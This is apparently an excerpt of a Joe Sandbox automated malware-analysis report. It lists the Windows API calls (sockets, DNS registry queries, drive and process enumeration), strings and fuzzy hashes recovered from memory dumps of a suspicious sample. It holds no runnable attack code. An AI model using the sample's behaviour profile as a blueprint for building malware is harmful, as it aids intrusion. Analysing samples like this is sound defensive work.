                                                                • Instruction ID: fef2e3fa8ba84e5db381ea67dcbf211350f9b541c34302c4accb359d7406641b
                                                                • Opcode Fuzzy Hash: 0a59c58ba0fd2a14d9859fe5daab2a36d0cc07e5e67531c1dc0d3ab769eddc38
                                                                • Instruction Fuzzy Hash: F2C17D716053059FDB18DF24C890E6AB7E5BF88314F05896CF8898B3A2EB34ED45CB81
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8690ab92467b0217421dd7f9425fc24db9d4aa1f9c6438cbf790806ce60f5bb1
                                                                • Instruction ID: ff51598ffa5c7ec18d4f6f1a2b06b1c105c83e6493b82135bb2ddc58b1cffb44
                                                                • Opcode Fuzzy Hash: 8690ab92467b0217421dd7f9425fc24db9d4aa1f9c6438cbf790806ce60f5bb1
                                                                • Instruction Fuzzy Hash: C291053062C7498BDB35AB6988807BB72D5FFC4324F188B2CE899C31D4EB749C40E691
                                                                APIs
                                                                • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0093712E,?,?,?,00001001,00000000), ref: 0094A90D
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Similarity
                                                                • API ID: recvfrom
                                                                • String ID:
                                                                • API String ID: 846543921-0
                                                                • Opcode ID: 65308eb213bc4ba22ac3700cc95ffb5b7b4b0b9d7e84e98195cc0471aec748d6
                                                                • Instruction ID: 5c7a81357dc6f2cfe6808ed4092a6e598cfb8dce257f100d909912040380c097
                                                                • Opcode Fuzzy Hash: 65308eb213bc4ba22ac3700cc95ffb5b7b4b0b9d7e84e98195cc0471aec748d6
                                                                • Instruction Fuzzy Hash: 38F06D75108308AFD2109E01DC48DABBBEDEFC9758F05495DF948132118270AE10CAB6
                                                                APIs
                                                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0093A499
                                                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0093A4FB
                                                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0093A531
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0093AA19
                                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0093AA4C
                                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0093AA97
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0093AAE9
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0093AB30
                                                                • RegCloseKey.KERNELBASE(?), ref: 0093AB6A
                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0093AB82
                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0093AC46
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0093AD0A
                                                                • RegEnumKeyExA.KERNELBASE ref: 0093AD8D
                                                                • RegCloseKey.KERNELBASE(?), ref: 0093ADD9
                                                                • RegEnumKeyExA.KERNELBASE ref: 0093AE08
                                                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0093AE2A
                                                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0093AE54
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0093AF63
                                                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0093AFB2
                                                                • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0093B072
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Similarity
                                                                • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                                • API String ID: 4281207131-1047472027
                                                                • Opcode ID: d962b193d76e06af956f2c8a39897f201faca7a03f05e1a19f8285e73c59a6f9
                                                                • Instruction ID: eb9af784358dd89ea556f66133ff27b94d949e9d6e3fbf2a9412754016c3083b
                                                                • Opcode Fuzzy Hash: d962b193d76e06af956f2c8a39897f201faca7a03f05e1a19f8285e73c59a6f9
                                                                • Instruction Fuzzy Hash: A4727FB1608301AFE710DB24CC82F6BB7E8AF85740F145829F985E72A1E775E948CB53
                                                                APIs
                                                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 008BA831
                                                                Strings
                                                                • @, xrefs: 008BA8F4
                                                                • @, xrefs: 008BAC42
                                                                • cf_socket_open() -> %d, fd=%d, xrefs: 008BA796
                                                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 008BAE1F
                                                                • Local Interface %s is ip %s using address family %i, xrefs: 008BAE60
                                                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 008BAD0A
                                                                • Local port: %hu, xrefs: 008BAF28
                                                                • bind failed with errno %d: %s, xrefs: 008BB080
                                                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 008BADAC
                                                                • cf-socket.c, xrefs: 008BA5CD, 008BA735
                                                                • Trying %s:%d..., xrefs: 008BA7C2, 008BA7DE
                                                                • Trying [%s]:%d..., xrefs: 008BA689
                                                                • Bind to local port %d failed, trying next, xrefs: 008BAFE5
                                                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 008BA6CE
                                                                • Could not set TCP_NODELAY: %s, xrefs: 008BA871
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: setsockopt
                                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                                • API String ID: 3981526788-2373386790
                                                                • Opcode ID: dd1863b238c23af065cb41193af6db1a57c772e183a3215130e9e0de81661f00
                                                                • Instruction ID: b8cfe4cc217c899c3118d1b51838de071ad250f96dc1ffc109626f811a92a0da
                                                                • Opcode Fuzzy Hash: dd1863b238c23af065cb41193af6db1a57c772e183a3215130e9e0de81661f00
                                                                • Instruction Fuzzy Hash: ED62D071508381ABE7258F24C846BEBB7E4FF91314F084929F99897392E771E845CB93

                                                                Control-flow Graph (first block 949740-94975b; legend: Executed / Not Executed)
                                                                APIs
                                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00949946
                                                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00949974
                                                                • RegCloseKey.KERNELBASE(?), ref: 0094998B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: CloseOpenQueryValue
                                                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                                • API String ID: 3677997916-4129964100
                                                                • Opcode ID: 6fa2705d9c41a23d33ea60536daa5e14116eb5eab9b41fe90413232ecfae635d
                                                                • Instruction ID: 13798060ee61c260f8d884b2ac613bb0c540a50b3115835387b8dca75473f894
                                                                • Opcode Fuzzy Hash: 6fa2705d9c41a23d33ea60536daa5e14116eb5eab9b41fe90413232ecfae635d
                                                                • Instruction Fuzzy Hash: 6C3298B59042016BEB11AB25EC42F1B76E8AF95318F084838FD4D962A3F731ED19DB53

                                                                Control-flow Graph (first block 8b8b50-8b8b69; legend: Executed / Not Executed)
                                                                APIs
                                                                • connect.WS2_32(?,?,00000001), ref: 008B8C30
                                                                • SleepEx.KERNELBASE(00000000,00000000), ref: 008B8CF3
                                                                • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 008B8D0E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: Sleepconnectgetsockopt
                                                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                • API String ID: 1669343778-879669977
                                                                • Opcode ID: fbff6ae28b158d6a0b8865170c6f1275b3f625f74515cf647c38e03268ee57eb
                                                                • Instruction ID: 30f16ded3667f688c5ba1c76178b3e1f543df8c3d2c96f86099102e1690e27b7
                                                                • Opcode Fuzzy Hash: fbff6ae28b158d6a0b8865170c6f1275b3f625f74515cf647c38e03268ee57eb
                                                                • Instruction Fuzzy Hash: 81B1A070604705EFDB20CF24C985BA67BA8FF55324F188929E8698B392DB71E844C762

                                                                Control-flow Graph (first block 882f17-882f8c; legend: Executed / Not Executed)
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: CloseEnumOpen
                                                                • String ID: d
                                                                • API String ID: 1332880857-2564639436
                                                                • Opcode ID: dc8162a8a97090fe9862ab6c58a467f4e11490e74919117c508e5b3a129a12e9
                                                                • Instruction ID: 78455ca68c0a90e1faf4c0fb9232488711f529cec6e9ceed76a41b52b7c9bc2b
                                                                • Opcode Fuzzy Hash: dc8162a8a97090fe9862ab6c58a467f4e11490e74919117c508e5b3a129a12e9
                                                                • Instruction Fuzzy Hash: 4171B4B49043099FDB10EF69C98579EBBF0FF84318F10886DE498A7311D7749A898F52

                                                                Control-flow Graph (first block 8b9290-8b92ed; legend: Executed / Not Executed)
                                                                APIs
                                                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 008B935D
                                                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 008B9388
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: Ioctlsetsockopt
                                                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                                • API String ID: 1903391676-2691795271

                                                                APIs
                                                                • send.WS2_32(multi.c,?,?,?,00883D4E,00000000,?,?,008907BF), ref: 008876EB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: send
                                                                • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                                • API String ID: 2809346765-3388739168

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: recv
                                                                • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                                • API String ID: 1507349165-640788491

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                                • API String ID: 98920635-842387772

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\$k`aa
                                                                • API String ID: 999431828-564663876

                                                                APIs
                                                                • getsockname.WS2_32(?,?,00000080), ref: 008BA1C6
                                                                Strings
                                                                • getsockname() failed with errno %d: %s, xrefs: 008BA1F0
                                                                • ssloc inet_ntop() failed with errno %d: %s, xrefs: 008BA23B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: getsockname
                                                                • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                                • API String ID: 3358416759-2605427207

                                                                APIs
                                                                • WSAStartup.WS2_32(00000202), ref: 0089D65B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID: if_nametoindex$iphlpapi.dll
                                                                • API String ID: 724789610-3097795196

                                                                APIs
                                                                • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0094AB9B
                                                                • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0094ABE3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: ioctlsocketsocket
                                                                • String ID:
                                                                • API String ID: 416004797-0
                                                                • Opcode ID: c87f868584a929c2e1e8b7efeaeae729b6f7569dac628e22653668d7c3bc3237
                                                                • Instruction ID: 617d15fa12455d84c625e349464c40aac09b0177569d85224b125ed97a8a97a9
                                                                • Opcode Fuzzy Hash: c87f868584a929c2e1e8b7efeaeae729b6f7569dac628e22653668d7c3bc3237
                                                                • Instruction Fuzzy Hash: 1CE1D0706443029FEB20CF24C885F6BB7E9EF89314F144A2CF9998B291E775D944CB92
                                                                APIs
                                                                • GetLogicalDrives.KERNELBASE ref: 06FB0CDA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 1b4360953581f7dd1a45d0c2f0d3157f7be5312af954884e484645129423d613
                                                                • Instruction ID: 5dee809489bf3b4a0542e0b6c60a3a718c87308fc378f935e00700db91f07428
                                                                • Opcode Fuzzy Hash: 1b4360953581f7dd1a45d0c2f0d3157f7be5312af954884e484645129423d613
                                                                • Instruction Fuzzy Hash: 3B2135E300C1107DF782C6926B50AF77FAED6C7330730A466F047D6502DF940A0A9171
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 1728c0bbf8a2cefc3f83e5087ee4efed4dd175e0529f1ab872debc0de269c79c
                                                                • Instruction ID: 226736a8dce5c7c685cb93c25baf1fb438a957838d93e60150a8b20e5ee31761
                                                                • Opcode Fuzzy Hash: 1728c0bbf8a2cefc3f83e5087ee4efed4dd175e0529f1ab872debc0de269c79c
                                                                • Instruction Fuzzy Hash: 0F21D5E710C1007DB782D5936B54BFB7BAEEAC6330731E466F007D6602DF950A4A92B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 53f73658a245f5cc4307995f3f7297fce21d2d0a4260d285bcf569828ce7bdc7
                                                                • Instruction ID: a7a0b8931dcdd183c5b27eedde68a78254bfef7c2aed28d166c903009b42bd06
                                                                • Opcode Fuzzy Hash: 53f73658a245f5cc4307995f3f7297fce21d2d0a4260d285bcf569828ce7bdc7
                                                                • Instruction Fuzzy Hash: E82128E71081047DF382D5836F50BF77BAEEBCA330731A466F406D6542DB990A4A91B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: e254129ffd6689fcff5ab3b9d29c58c3d4eb2319c96fbf65a59dc221a86f1844
                                                                • Instruction ID: 00bc62ba35e32d571dfdc623817de469c491d98a82d90e62594871a7d0b44a95
                                                                • Opcode Fuzzy Hash: e254129ffd6689fcff5ab3b9d29c58c3d4eb2319c96fbf65a59dc221a86f1844
                                                                • Instruction Fuzzy Hash: D111E2E710C1107DF382D5876B50BFB6BAEEACA330B309467F407C6602DB990B4A51B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: 1e6f41b59a0dde30257bb03acdd22d2c63fc9a6e6b334685589e3884d7f00d6d
                                                                • Instruction ID: 8dbcb2d8447134b6b55b04351546ac51a92fd32d6aa4c70e3c832036c7f5c9ea
                                                                • Opcode Fuzzy Hash: 1e6f41b59a0dde30257bb03acdd22d2c63fc9a6e6b334685589e3884d7f00d6d
                                                                • Instruction Fuzzy Hash: B411D6E71481107EF382D5976B50BFB6BADEBCA330B309466F407C6642DB990A4A5172
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635326293.0000000006FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fb0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: DrivesLogical
                                                                • String ID: A:\
                                                                • API String ID: 999431828-3379428675
                                                                • Opcode ID: d1f3928b52dfb0d87f7fc32368fae6a4f0ca841114be559baba5525f994e7a9a
                                                                • Instruction ID: dad148b77f389df3c9c123fd91f7b274138a79ee8e9285a33d25e09fd52b0535
                                                                • Opcode Fuzzy Hash: d1f3928b52dfb0d87f7fc32368fae6a4f0ca841114be559baba5525f994e7a9a
                                                                • Instruction Fuzzy Hash: F61108E71081107EF392D5976B507FB7FAEEBCA330B309466F006C6642DF550A4A51B2
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID: FD %s:%d sclose(%d)
                                                                • API String ID: 2781271927-3116021458
                                                                • Opcode ID: 0c94f79e10b6b310d79ee2d55981a0977c8037770a8139723d80649d891aec66
                                                                • Instruction ID: a187819f476d4051a104e5f07d57f19062009f3c1dcede0d7f2873607dce62ac
                                                                • Opcode Fuzzy Hash: 0c94f79e10b6b310d79ee2d55981a0977c8037770a8139723d80649d891aec66
                                                                • Instruction Fuzzy Hash: 67D05E32A192216B852065596D49C4BBAB8EDC7FA0F060868F940B7215D120DC0483F2
                                                                APIs
                                                                • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0094B29E,?,00000000,?,?), ref: 0094B0B9
                                                                • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00933C41,00000000), ref: 0094B0C1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_880000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastconnect
                                                                • String ID:
                                                                • API String ID: 374722065-0
                                                                • Opcode ID: f544deebafb489c3af780b720e82fe9be50b6db37299eb097f9dde30f0ecc0a6
                                                                • Instruction ID: 4933147b54eab5a93c3312df6158956bd2048d041ce267108dcda8a18cb39977
                                                                • Opcode Fuzzy Hash: f544deebafb489c3af780b720e82fe9be50b6db37299eb097f9dde30f0ecc0a6
                                                                • Instruction Fuzzy Hash: C901D4322082009BCA209A79CC84F6BB399FF89365F140B24F978A31E5D726ED508762
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: 49e6c9e74aa9497aa161fc9e531897d65dc168ac935f0092f1e4dad39e9795db
                                                                • Instruction ID: a6b5610ab2542a1f233d1e9eb485c02588f17919fe875d5bc99a95ad6d5708d9
                                                                • Opcode Fuzzy Hash: 49e6c9e74aa9497aa161fc9e531897d65dc168ac935f0092f1e4dad39e9795db
                                                                • Instruction Fuzzy Hash: E6D1C1FB14C311BEB381C5817B54AFA676EF7D6738B308426F807D6602EBA80A4945B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: 0e0eec498f14d015f6f2709b29a690a26aee37fab4635ce89786a0a6426b0e76
                                                                • Instruction ID: df28eae02e0e27400af42374ba819312cc9af0bb14a7837533946ab9d4b06016
                                                                • Opcode Fuzzy Hash: 0e0eec498f14d015f6f2709b29a690a26aee37fab4635ce89786a0a6426b0e76
                                                                • Instruction Fuzzy Hash: A5D1D2FB14C311BEB382C5817B54BFA676EF7D6738B308426F807D5602EBA40A4955B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: 353f0bf9ce249017c039ccea37157755fd9777919a1e77e687ca88c052869846
                                                                • Instruction ID: 3240a771a4e86ecbec63b7b9bf76dcc7ea596c9db75619b8eed58926669a532d
                                                                • Opcode Fuzzy Hash: 353f0bf9ce249017c039ccea37157755fd9777919a1e77e687ca88c052869846
                                                                • Instruction Fuzzy Hash: CFD1D0FB14C311BEB382C4857B54BFA676EF7D6738B308426F807D5602EBA80A4914B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: 5d08134e108b7a4ca868f16f51ef8d9bb12a881892b1d33cb24681edfe676490
                                                                • Instruction ID: fed079c72ed67a9dd593f3fccc9b9bbce183fa8280e46e5952475be06c67ddb9
                                                                • Opcode Fuzzy Hash: 5d08134e108b7a4ca868f16f51ef8d9bb12a881892b1d33cb24681edfe676490
                                                                • Instruction Fuzzy Hash: 6BD1C1FB14C311BEF382C5857B54AFA676EF7D6338B308426F407D5602EBA40A4955B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                • Opcode ID: 475782b2b20636ba59429bd07b31dc84d1bba163007d7865ca384c4daab078f3
                                                                • Instruction ID: 7c3cb786580f314d2dd45dc216edfc55b04ca13286d8421e9059d5ffbc8d8cfe
                                                                • Opcode Fuzzy Hash: 475782b2b20636ba59429bd07b31dc84d1bba163007d7865ca384c4daab078f3
                                                                • Instruction Fuzzy Hash: 57D1C0FB14C315BEB382C4857B54BFA676EF7D6738B308426F807D5602EBA80A4914B1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635283279.0000000006FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_6fa0000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: )h
                                                                • API String ID: 0-3514190831
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                APIs
                                                                • Process32FirstW.KERNEL32(47CF7FBB,?,?,?), ref: 07000362
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2635445326.0000000007000000.00000040.00001000.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7000000_f9bcOz8SxR.jbxd
                                                                Similarity
                                                                • API ID: FirstProcess32
                                                                • String ID:
                                                                • API String ID: 2623510744-0
                                                                APIs
                                                                • gethostname.WS2_32(00000000,00000040), ref: 00934AA5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2623343167.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
